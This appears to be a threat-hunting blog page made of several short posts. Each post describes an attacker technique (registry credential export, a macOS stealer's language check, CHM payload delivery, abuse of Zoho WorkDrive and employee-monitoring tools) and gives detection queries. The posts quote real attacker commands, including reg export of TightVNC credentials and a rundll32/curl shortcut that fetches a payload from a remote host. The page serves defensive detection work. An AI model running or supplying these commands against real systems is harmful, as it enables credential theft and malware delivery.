Know Your Adversary

Hello everyone! Today we’ll once again talk about the Windows Registry and look at an example of the Unsecured Credentials: Credentials in Registry (T1552.002) technique. While reading an investigation report on the CL-UNK-1068  attacks in South, Southeast, and East Asia, I once again noticed that attackers actively abused reg.exe . In particular, they frequently used the export parameter, for example: reg export "HKEY_USERS\[%SID%]\SOFTWARE\TightVNC\Server" reg export HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TightVNC\Server reg export HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server In this case, the attacker exports the TightVNC configuration from the registry in order to obtain credentials. For detection, we can either use specific registry keys that contain sensitive data or proactively search for suspicious export events: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: "export" See you soon!

Hello everyone! Sometimes, even if a victim runs a malicious file, the system may still avoid compromise. One reason for this is the use of the System Location Discovery: System Language Discovery (T1614.001) technique. The point is that in some cases attackers do not want their malware to run on systems located in certain countries. Today we’ll look at an example of how attackers restrict the download of a stealer for systems that may be located in CIS countries. So, the loader for the SHub stealer targeting macOS used the following command to obtain information about the language of the compromised system: defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian The AppleEnabledInputSources key in the com.apple.HIToolbox.plist file contains information about keyboard layouts. Its contents are checked for the presence of the Russian language, which is typical for CIS systems. A good detection opportunity is suspicious...

Hello everyone! Today we’ll take a look at a technique that isn’t very common. Nevertheless, it occasionally appears in attackers’ toolkits. This is System Binary Proxy Execution: Compiled HTML File (T1218.001) . This technique is often used in the early stages of the cyberattack lifecycle. For example, attackers may distribute malicious CHM files inside archives as attachments in phishing emails. Let’s look at an example. In this case , the attackers used an archive containing a shortcut with the following command: "C:\Windows\System32\rundll32.exe" shell32.dll ShellExec_RunDLL conhost --headless cmd /c curl www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png -L""skontv&hh -d""ecompile^ . nt""v&0.ln""k In this scenario, the CHM file is downloaded from a remote web resource and extracted using Windows HTML Help ( hh.exe ), while using the -decompile argument. In the context of threat hunting, we can look for events in...

Hello everyone! Today we’ll talk about another legitimate service that attackers abuse - in this case, APT37. And of course, we’ll look at how to use this information for proactive threat hunting. So, in one of APT37’s fairly recent campaigns (we track this cluster as Squid Werewolf), they used the RESTLEAF implant, which abused Zoho WorkDrive - a cloud-based file management and collaboration platform. From a proactive hunting perspective, we can identify all network communications related to Zoho WorkDrive and then separate the legitimate events: event_type: "dnsreqwin" AND dns_rname: "workdrive.zohoexternal.com" See you soon!

Hello everyone! It seems the trend is indeed being confirmed: another legitimate employee monitoring tool has ended up in the arsenal of attackers. Malwarebytes reported on a campaign in which attackers disguise Teramind installers as Zoom and Google Meet updates. Teramind is a software platform for employee monitoring and workplace activity analysis. It helps companies track and analyze user actions on computers and across networks to improve security, productivity, and compliance with corporate policies. However, attackers can use such software for unauthorized access to corporate systems. First, we can look for events related to the execution of files signed by Teramind Inc. , for example: event_type: "processcreatewin" AND proc_file_sig: "teramind" You can also check for suspicious communications with teramind[.]co : event_type: "dnsreqwin" AND dns_rname: "teramind.co" See you soon!

Hello everyone! I think we’re all used to attackers abusing remote administration tools, but it seems a new trend is emerging - the abuse of employee monitoring tools. We’ve already seen attackers use Controlio and Mipko Employee Monitor, and in a recent report by Huntress it’s noted that ransomware operators have added yet another similar tool to their arsenal - Network LookOut Net Monitor for Employees. What should you look for? For example, suspicious interaction with networklookout[.]com : event_type: "dnsreqwin" AND dns_rname: "networklookout.com" And, of course, process execution events whose metadata indicates this tool, for example: event_type: "processcreatewin" AND proc_file_productname: "Net Monitor for Employees Pro" See you soon!